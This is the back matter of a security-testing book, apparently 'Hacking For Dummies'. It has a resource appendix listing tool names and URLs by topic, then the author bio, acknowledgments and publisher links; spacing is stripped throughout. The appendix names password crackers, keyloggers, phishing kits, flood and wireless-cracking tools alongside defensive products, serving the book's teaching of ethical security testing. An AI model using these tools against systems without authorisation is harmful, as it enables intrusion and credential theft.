https://technet.microsoft.com/en-us/windows/hh826072.aspx

NetworksArpwatch—http://linux.maruhn.com/sec/arpwatch.html

Blast—www.mcafee.com/us/downloads/free-tools/blast.aspx


CommView—www.tamos.com/products/commview

dsniff—www.monkey.org/~dugsong/dsniff

EssentialNetTools—www.tamos.com/products/nettools

Fortinet—www.fortinet.com

Getif—www.wtcs.org/snmp4tpc/getif.htm


IKECrack—http://ikecrack.sourceforge.net

MACaddressvendorlookup—https://regauth.standards.ieee.org/standards-ra-web/pub/view.html#registries

Nessusvulnerabilityscanner—www.tenable.com/products/nessus

Netcat—http://netcat.sourceforge.net

netfilter/iptables—www.netfilter.org

NetResident—www.tamos.com/products/netresident

NetScanToolsPro—www.netscantools.com

Nping—https://nmap.org/nping

Nexpose—www.rapid7.com/products/nexpose/compare-downloads.jsp

Nmapportscanner—http://nmap.org

NMapWin—http://sourceforge.net/projects/nmapwin

OmniPeek—www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis

Postlist—www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt

Portnumberlookup—www.cotse.com/cgi-bin/port.cgiPortSentry—http://sourceforge.net/projects/sentrytools

PromiscDetect—http://ntsecurity.nu/toolbox/promiscdetect

QualysGuardvulnerabilityscanner—www.qualys.com

SoftPerfectNetworkScanner—www.softperfect.com/products/networkscanner

SMACMACaddresschanger—www.klcconsulting.net/smac

http://linux.maruhn.com/sec/arpwatch.html

http://www.mcafee.com/us/downloads/free-tools/blast.aspx




http://www.tamos.com/products/nettools/

http://www.fortinet.com/

http://www.wtcs.org/snmp4tpc/getif.htm

http://www.gfi.com/network-security-vulnerability-scanner

http://ikecrack.sourceforge.net/

https://regauth.standards.ieee.org/standards-ra-web/pub/view.html#registries

http://www.tenable.com/products/nessus

http://netcat.sourceforge.net/

http://www.netfilter.org/



https://nmap.org/nping

https://www.rapid7.com/products/nexpose/compare-downloads.jsp

http://nmap.org/



http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt

http://www.cotse.com/cgi-bin/port.cgiPortSentry

http://sourceforge.net/projects/sentrytools/





SNARE—www.intersectalliance.com/projects/Snare

sniffdet—http://sniffdet.sourceforge.net

SonicWALL—www.sonicwall.com

SynfulKnockScanner—http://talosintel.com/scanner

TamoSoftEssentialNetTools—www.tamos.com/products/nettools

TrafficIQProfessional—www.idappcom.com

UDPFlood—www.mcafee.com/us/downloads/free-tools/udpflood.aspx

WhatIsMyIP—www.whatismyip.com

Wireshark—www.wireshark.org

http://www.intersectalliance.com/projects/Snare/


http://www.sonicwall.com/

http://talosintel.com/scanner

http://www.tamos.com/products/nettools

http://www.idappcom.com

http://www.mcafee.com/us/downloads/free-tools/udpflood.aspx

https://www.whatismyip.com/

https://www.wireshark.org/

PasswordCrackingAdvancedArchivePasswordRecovery—www.elcomsoft.com/archpr.html

BIOSpasswords—http://labmice.techtarget.com/articles/BIOS_hack.htm

BitLockersecuritywhitepapers—www.principlelogic.com/bitlocker.html

Brutus—www.hoobie.net/brutus


Crack—ftp://coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack

Defaultvendorpasswords—www.cirt.net/passwords

Dictionaryfilesandwordlists


https://packetstormsecurity.org/Crackers/wordlists


eBlasterandSpectorPro—www.spectorsoft.com

ElcomSoftDistributedPasswordRecovery—www.elcomsoft.com/edpr.html

ElcomSoftForensicDiskDecryptor—www.elcomsoft.com/efdd.html

ElcomSoftSystemRecovery—www.elcomsoft.com/esr.html

InvisibleKeyLoggerStealth—www.amecisco.com/iks.htm

JohntheRipper—www.openwall.com/john

KeyGhost—www.keyghost.com

LastPass—https://lastpass.com

NetBIOSAuditingTool—www.securityfocus.com/tools/543

NISTGuidetoEnterprisePasswordManagement—http://csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf

NTAccess—www.mirider.com/ntaccess.html

ophcrack—http://ophcrack.sourceforge.net

OxygenForensicSuite—www.oxygen-forensic.com

Pandora—www.nmrc.org/project/pandora

PasswareKitForensic—www.lostpassword.com/kit-forensic.htm

PasswordSafe—http://passwordsafe.sourceforge.net

ProactivePasswordAuditor—www.elcomsoft.com/ppa.html

ProactiveSystemPasswordRecovery—www.elcomsoft.com/pspr.html

https://www.elcomsoft.com/archpr.html

http://labmice.techtarget.com/articles/BIOS_hack.htm




ftp://coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack

https://www.cirt.net/passwords/


https://packetstormsecurity.org/Crackers/wordlists/


http://www.spectorsoft.com/

https://www.elcomsoft.com/edpr.html

https://www.elcomsoft.com/efdd.html

https://www.elcomsoft.com/esr.html

http://www.amecisco.com/iks.htm



https://lastpass.com/

http://www.securityfocus.com/tools/543

http://csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf

http://www.mirider.com/ntaccess.html


http://www.oxygen-forensic.com

http://www.nmrc.org/project/pandora/


http://passwordsafe.sourceforge.net/

https://www.elcomsoft.com/ppa.html

https://www.elcomsoft.com/pspr.html

Pwdump3—www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7

RainbowCrack—http://project-rainbowcrack.com

Rainbowtables—http://rainbowtables.shmoo.com

SQLPing3—www.sqlsecurity.com/downloads

THC-Hydra—www.thc.org/thc-hydra

WinHex—www.winhex.com



http://rainbowtables.shmoo.com/

http://www.sqlsecurity.com/downloads


http://www.winhex.com/

PatchManagementDebianLinuxSecurityAlerts—www.debian.org/security

DellKACESystemsManagementAppliance—http://software.dell.com/products/kace-k1000-systems-management-

appliance/patch-management-security.aspx

EcoraPatchManager—www.ecora.com/ecora/products/patchmanager.asp


IBMBigFix—www-03.ibm.com/security/bigfix

KDESoftwareUpdater—https://en.opensuse.org/System_Updates

LumensionPatchandRemediation—www.lumension.com/vulnerability-management/patch-management-software.aspx

ManageEngine—www.manageengine.com/products/desktop-central/linux-management.html

MicrosoftSecurityTechCenter—https://technet.microsoft.com/en-us/security/default.aspx

ShavlikPatch—www.shavlik.com/products/patch

SlackwareLinuxSecurityAdvisories—www.slackware.com/security

WindowsServerUpdateServicesfromMicrosoft—https://technet.microsoft.com/en-us/windowsserver/bb332157.aspx

http://www.debian.org/security/

http://software.dell.com/products/kace-k1000-systems-management-appliance/patch-management-security.aspx

http://www.ecora.com/ecora/products/patchmanager.asp

http://www.gfi.com/network-security-vulnerability-scanner

http://www-03.ibm.com/security/bigfix/

https://en.opensuse.org/System_Updates

https://www.lumension.com/vulnerability-management/patch-management-software.aspx

https://www.manageengine.com/products/desktop-central/linux-management.html

https://technet.microsoft.com/en-us/security/default.aspx

http://www.shavlik.com/products/patch/

http://www.slackware.com/security/

https://technet.microsoft.com/en-us/windowsserver/bb332157.aspx

SecurityEducationandLearningResources

KevinBeaver’sinformationsecurityarticles,whitepapers,webcasts,podcasts,andscreencasts—www.principlelogic.com/resources.html

KevinBeaver’sSecurityOnWheelsinformationsecurityaudioprograms—http://securityonwheels.com

KevinBeaver’sSecurityOnWheelsblog—http://securityonwheels.com/blog

KevinBeaver’sTwitterpage—https://twitter.com/kevinbeaver

http://www.principlelogic.com/resources.html

http://securityonwheels.com/

http://securityonwheels.com/blog/

https://twitter.com/kevinbeaver/

SecurityMethodsandModelsOpenSourceSecurityTestingMethodologyManual—www.isecom.org/research/osstmm.html

OWASP—www.owasp.org

SecurITree—www.amenaza.com

TheOpenGroup’sFAIRRiskTaxonomy—www.opengroup.org/subjectareas/security/risk

http://www.isecom.org/research/osstmm.html


http://www.amenaza.com/

http://www.opengroup.org/subjectareas/security/risk

SocialEngineringandPhishingCheckShortURL—www.checkshorturl.com

LUCY—http://phishing-server.com

SimplePhishingToolkit—https://github.com/sptoolkit/sptoolkit

SocialEngineerToolkit—www.trustedsec.com/social-engineer-toolkit

WhereDoesThisLinkGo?—http://wheredoesthislinkgo.com

http://www.checkshorturl.com

http://phishing-server.com/

https://github.com/sptoolkit/sptoolkit

http://www.trustedsec.com/social-engineer-toolkit/

http://wheredoesthislinkgo.com

SourceCodeAnalysisCheckmarx—www.checkmarx.com


StatisticsPrivacyRightsClearinghouseChronologyofDataBreaches—www.privacyrights.org/data-breach

VerizonDataBreachInvestigationsReport—www.verizonenterprise.com/DBIR

http://www.privacyrights.org/data-breach


StorageEffectiveFileSearch—www.sowsoft.com/search.htm

FileLocatorPro—www.mythicsoft.com

IdentityFinder—www.identityfinder.com

http://www.sowsoft.com/search.htm

http://www.mythicsoft.com/

http://www.identityfinder.com/

SystemHardeningBastilleLinuxHardeningProgram—http://bastille-linux.sourceforge.net

CenterforInternetSecurityBenchmarks—www.cisecurity.org

DeepFreezeEnterprise—www.faronics.com/products/deep-freeze/enterprise

Fortres101—www.fortresgrand.com

Imperva—www.imperva.com/products/databasesecurity

LinuxAdministrator’sSecurityGuide—www.seifried.org/lasg

MicrosoftSecurityComplianceManager—https://technet.microsoft.com/en-us/library/cc677002.aspx

ServerDefender—www.port80software.com/products/serverdefender

SymantecPGP—www.symantec.com/products-solutions/families/?fid=encryption

WinMagic—www.winmagic.com

http://bastille-linux.sourceforge.net/


http://www.faronics.com/products/deep-freeze/enterprise/

http://www.fortresgrand.com/

http://www.imperva.com/products/databasesecurity

https://www.seifried.org/lasg/

https://technet.microsoft.com/en-us/library/cc677002.aspx

http://www.port80software.com/products/serverdefender/

http://www.symantec.com/products-solutions/families/?fid=encryption

http://www.winmagic.com/

UserAwarenessandTrainingAwareityMOAT—www.awareity.com

DogwoodManagementPartnersSecurityPosters—www.securityposters.net

GreenideaVisibleStatement—www.greenidea.com

Interpact,Inc.AwarenessResources—www.thesecurityawarenesscompany.com

ManaginganInformationSecurityandPrivacyAwarenessandTrainingProgrambyRebeccaHerold(Auerbach)—www.amazon.com/Managing-Information-Security-Awareness-Training/dp/0849329639

PeterDavis&Associatestrainingservices—www.pdaconsulting.com/services.htm

SecurityAwareness,Inc.—www.securityawareness.com

http://www.awareity.com/

http://www.securityposters.net/

http://www.greenidea.com/

http://www.thesecurityawarenesscompany.com/

http://www.amazon.com/Managing-Information-Security-Awareness-Training/dp/0849329639/

http://www.pdaconsulting.com/services.htm

http://www.securityawareness.com/

VoiceoverIPCain&Abel—www.oxid.it/cain.html

CommView—www.tamos.com/products/commview

ListingofvariousVoIPtools—www.voipsa.org/Resources/tools.php

NIST’sSP800-58document—http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf


PROTOS—www.ee.oulu.fi/research/ouspg/Protos

VoIPHopper—http://voiphopper.sourceforge.net

vomit—http://vomit.xtdnet.nl



http://www.voipsa.org/Resources/tools.php

http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf


https://www.ee.oulu.fi/research/ouspg/Protos

http://voiphopper.sourceforge.net/

http://vomit.xtdnet.nl/

VulnerabilityDatabasesCommonVulnerabilitiesandExposures—http://cve.mitre.org

CWE/SANSTop25MostDangerousProgrammingErrors—www.sans.org/top25-software-errors

NationalVulnerabilityDatabase—http://nvd.nist.gov

SANSCriticalSecurityContrils—www.sans.org/critical-security-controls

US-CERTVulnerabilityNotesDatabase—www.kb.cert.org/vuls

http://cve.mitre.org/

http://www.sans.org/top25-software-errors/


http://www.sans.org/critical-security-controls/

http://www.kb.cert.org/vuls/

WebsitesandApplicationsAcunetixWebVulnerabilityScanner—www.acunetix.com

AppSpider—www.rapid7.com//products//appspider

Brutus—www.hoobie.net/brutus/index.html

BurpProxy—https://portswigger.net/burp/proxy.html

CheckmarxCxDeveloper—www.checkmarx.com

Defacedwebsites—http://zone-h.org/archive

FirefoxWebDeveloper—http://chrispederick.com/work/web-developer

Foundstone’sSASSHacmeTools—www.mcafee.com/us/downloads/free-tools/index.aspx

GoogleHackHoneypot—http://ghh.sourceforge.net

GoogleHackingDatabase—www.exploit-db.com/google-hacking-database

HTTrackWebsiteCopier—www.httrack.com

Netsparker—www.netsparker.com

ParosProxy—http://sourceforge.net/projects/paros

Port80Software’sServerMask—www.port80software.com/products/servermask

QualysSSLLabs—www.ssllabs.com

SiteDigger—www.mcafee.com/us/downloads/free-tools/sitedigger.aspx

SQLInjectMe—https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me

SQLPowerInjector—www.sqlpowerinjector.com

THC-Hydra—www.thc.org/thc-hydra

Veracode—www.veracode.com

WebGoat—www.owasp.org/index.php/Category:OWASP_WebGoat_Project

WebInspect—www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/index.html

WSDigger—www.mcafee.com/us/downloads/free-tools/wsdigger.aspx

WSFuzzer—www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project

http://www.acunetix.com/


http://www.hoobie.net/brutus/index.html

https://portswigger.net/burp/proxy.html


http://zone-h.org/archive


http://www.mcafee.com/us/downloads/free-tools/index.aspx

http://ghh.sourceforge.net/

http://www.exploit-db.com/google-hacking-database

http://www.httrack.com/


http://sourceforge.net/projects/paros/

http://www.port80software.com/products/servermask

https://www.ssllabs.com

http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx

https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me

http://www.sqlpowerinjector.com/


http://www.veracode.com

https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

http://www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/index.html

http://www.mcafee.com/us/downloads/free-tools/wsdigger.aspx

https://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project

WindowsBitLockersecuritywhitepapers—www.principlelogic.com/bitlocker.html

DumpSec—www.systemtools.com/somarsoft/?somarsoft.com


MicrosoftBaselineSecurityAnalyzer—https://technet.microsoft.com/en-us/security/cc184924.aspx

NetworkUsers—www.optimumx.com/download/netusers.zip

Nexpose—www.rapid7.com/products/nexpose/compare-downloads.jsp


SoftPerfectNetworkScanner—www.softperfect.com/products/networkscanner

Sysinternals—https://technet.microsoft.com/en-us/sysinternals/default.aspx

Winfo—www.ntsecurity.nu/toolbox/winfo


http://www.systemtools.com/somarsoft/?somarsoft.com

http://www.gfi.com/network-security-vulnerability-scanner/

https://technet.microsoft.com/en-us/security/cc184924.aspx

http://www.optimumx.com/download/netusers.zip

http://www.rapid7.com/products/nexpose/compare-downloads.jsp



https://technet.microsoft.com/en-us/sysinternals/default.aspx


WirelessNetworksAircrack-ng—http://aircrack-ng.org

AirMagnetWiFiAnalyzer—www.flukenetworks.com/enterprise-network/wireless-network/airmagnet-wifi-analyzer

Asleap—http://sourceforge.net/projects/asleap

CommViewforWiFi—www.tamos.com/products/commwifi

DigitalHotspotter—www.canarywireless.com

ElcomSoftWirelessSecurityAuditor—www.elcomsoft.com/ewsa.html

HomebrewWiFiantenna—www.turnpoint.net/wireless/has.html

Kismet—www.kismetwireless.net

NetStumbler—www.netstumbler.com


Reaver—https://code.google.com/p/reaver-wps

SuperCantenna—www.cantenna.com

Wellenreiter—http://sourceforge.net/projects/wellenreiter

WEPCrack—http://wepcrack.sourceforge.net

WiFinder—www.boingo.com/retail/#s3781

WiFiPineapple—www.wifipineapple.com/index.php

WiGLEdatabaseofwirelessnetworks—https://wigle.net

WinAirsnort—http://winairsnort.free.fr


http://www.flukenetworks.com/enterprise-network/wireless-network/airmagnet-wifi-analyzer

http://sourceforge.net/projects/asleap

http://www.tamos.com/products/commwifi/

http://www.canarywireless.com/

https://www.elcomsoft.com/ewsa.html

http://www.turnpoint.net/wireless/has.html

http://www.kismetwireless.net/

http://www.netstumbler.com/


https://code.google.com/p/reaver-wps/

http://www.cantenna.com/

http://sourceforge.net/projects/wellenreiter/

http://wepcrack.sourceforge.net/

http://www.boingo.com/retail/#s3781

https://www.wifipineapple.com/index.php

https://wigle.net/

http://winairsnort.free.fr/

AbouttheAuthorKevinBeaverisanindependentinformationsecurityconsultant,expertwitness,professionalspeaker,andwriterwithAtlanta-basedPrincipleLogic,LLC.HehasnearlythreedecadesofexperienceinITandover20yearsinsecurity.Kevinspecializesinperformingindependentinformationsecurityassessmentsforcorporations,securityproductvendors,softwaredevelopers/cloudserviceproviders,governmentagencies,andnonprofitorganizations.Beforestartinghisinformationsecurityconsultingpracticein2001,Kevinservedinvariousinformationtechnologyandsecurityrolesforseveralhealthcare,e-commerce,financial,andeducationalinstitutions.

KevinhasappearedonCNNtelevisionasaninformationsecurityexpertandhasbeenquotedinTheWallStreetJournal,Entrepreneur,FortuneSmallBusiness,Women'sHealth,andonInc.magazine’stechnologysite,IncTechnology.com.Kevin’sworkhasalsobeenreferencedbythePCICouncilintheirDataSecurityStandardWirelessGuidelines.Kevinhasbeenatop-ratedspeaker,givinghundredsofpresentationsandpaneldiscussionsforITandsecurityseminars,conferences,andwebcastsoverthepastdecadeandahalf.

Kevinhasauthoredorco-authored12informationsecuritybooks,includingHackingWirelessNetworksForDummies,ImplementationStrategiesforFulfillingandMaintainingITCompliance(Realtimepublishers.com),andThePracticalGuidetoHIPAAPrivacyandSecurityCompliance(Auerbach).Kevinhaswrittenmorethanthreedozenwhitepapersandover900articlesandguestblogpostsforsitessuchasTechTarget’sSearchSecurity.com,ZiffDavis’Toolbox.com,andIBM’sSecurityIntelligence.com.KevinisthecreatorandproduceroftheSecurityOnWheelsaudiobooks,whichprovidesecuritylearningforITprofessionalsonthego(securityonwheels.com),andtheSecurityOnWheelsblog(securityonwheels.com/blog).HealsocoversinformationsecurityandrelatedmattersonTwitter(@kevinbeaver)andYouTube(PrincipleLogic).Kevinearnedhisbachelor’sdegreeinComputerEngineeringTechnologyfromSouthernCollegeofTechnologyandhismaster’sdegreeinManagementofTechnologyfromGeorgiaTech.HehasobtainedhisCISSPcertificationin2001andalsoholdsMCSE,MasterCNE,andITProject+certifications.

Kevincanbereachedthroughhiswebsite,www.principlelogic.com,andyoucanconnecttohimviaLinkedInatwww.linkedin.com/in/kevinbeaver.

http://www.securityonwheels.com

http://www.securityonwheels.com/blog

https://twitter.com/kevinbeaver



http://www.linkedin.com/in/kevinbeaver

DedicationDad,thisone’sforyou.Iwouldn’tbeheretodaywithoutyourguidanceandsupport.You’vetaughtmesomuchaboutcommonsense—itsabsenceinmuchoftheworldandhowimportantitisforbeingsuccessfulnomatterwhattheendeavor.Iloveyouverymuch.

Author’sAcknowledgmentsIwanttothankAmy,Garrett,andMaryLinforyourlovingways,funnyjokes,andwillingnesstodealwithmynonsensedayinanddayout,especiallysinceI’vebeenworkingontheupdatestothisedition!Istillloveeachofyou100percent!

I’dalsoliketothankAmyFandrei,myacquisitionseditor,forcontinuingthisprojectandpresentingmetheopportunitytoshapethisbookintosomethingI’mveryproudof.I’dliketothankmyprojecteditor,KatharineDvorak.You’vebeenverypatientandgreattoworkwith!I’mlookingforwardtoworkingwithyouagaininthefuture.Also,manythankstomytechnicaleditor,businesscolleague,friend,andco-authorofHackingWirelessNetworksForDummies,PeterT.Davis.I’mhonored(asalways)tobeworkingwithyouandverymuchappreciateyourfeedbackonthisedition!IalsowanttoextendasincerethankstoRichardStiennon—I’mflatteredthatsuchastrongleaderinmyfieldwaswillingtowritetheForewordtothisbook.

MuchgratitudetoRobertAbelawithNetsparker;NateCrampton,RyanPoppa,AlanLipton,HDMoore,JustinWarren,andDanKuykendallwithRapid7;VladimirKatalovandOlgaKoksharovawithElcomSoft;CristianFlorianwithGFISoftware;MatySimanandAsaphSchulmanwithCheckmarx;DmitySuminwithPassware;KirkThomaswithNorthwestPerformanceSoftware;DavidVestwithMythicsoft;MichaelBergwithTamoSoft;TerryIngoldsbywithAmenazaTechnologies;andOlegFedorovwithOxygenSoftwareCompanyforrespondingtoallofmyrequests.ContinuedthankstoDaveCoeforyourhelpinkeepingmecurrentonthelatestsecuritytoolsandhacks!MuchgratitudetoalltheothersIforgottomentionaswell.

MegathankstoRushandDreamTheaterforyourinspirationalwordsanddrivingsoundstogetmethroughthenot-feeling-creativetimesworkingonthisedition!

Finally,Iwanttoexpressmysincereappreciationtomyclientsforcontinuingtohireme,the“no-name-brand”consultantwhoworksforhimself,andkeepingmearoundforthelongterm.Iwouldn’tbeherewithoutyourwillingnesstobreakoutofthe“musthirebigcompany”mindsetandyourcontinuedsupport.Thankyouverymuch!

Publisher’sAcknowledgmentsAcquisitionsEditor:AmyFandrei

ProjectEditor:KatharineDvorak

TechnicalEditor:PeterT.Davis

Sr.EditorialAssistant:CherieCase

ProductionEditor:KinsonRaja

CoverImage:DenisVrublevski/Shutterstock

Toaccessthecheatsheetspecificallyforthisbook,gotowww.dummies.com/cheatsheet/hacking.

Findout“HOW”atDummies.com



TakeDummieswithyoueverywhereyougo!

GotoourWebsite

LikeusonFacebook

FollowusonTwitter

WatchusonYouTube

JoinusonLinkedIn

PinusonPinterest

Circleusongoogle+

Subscribetoournewsletter



http://www.facebook.com/fordummies

http://www.facebook.com/fordummies

http://www.twitter.com/fordummies

http://www.twitter.com/fordummies

http://www.youtube.com/user/fordummies

http://www.youtube.com/user/fordummies

http://www.linkedin.com/groups?home=&gid=3229946&trk=anet_ug_hm

http://www.linkedin.com/groups?home=&gid=3229946&trk=anet_ug_hm

http://pinterest.com/fordummies/

http://pinterest.com/fordummies/

https://plus.google.com/105265587979403653723

https://plus.google.com/105265587979403653723

http://www.dummies.com/go/newsletter

http://www.dummies.com/go/newsletter

CreateyourownDummiesbookcover

ShopOnline

http://covers.dummies.com/

http://covers.dummies.com/

http://dummiesmerchandise.com

http://dummiesmerchandise.com

WILEYENDUSERLICENSEAGREEMENT

Gotowww.wiley.com/go/eulatoaccessWiley’sebookEULA.

http://www.wiley.com/go/eula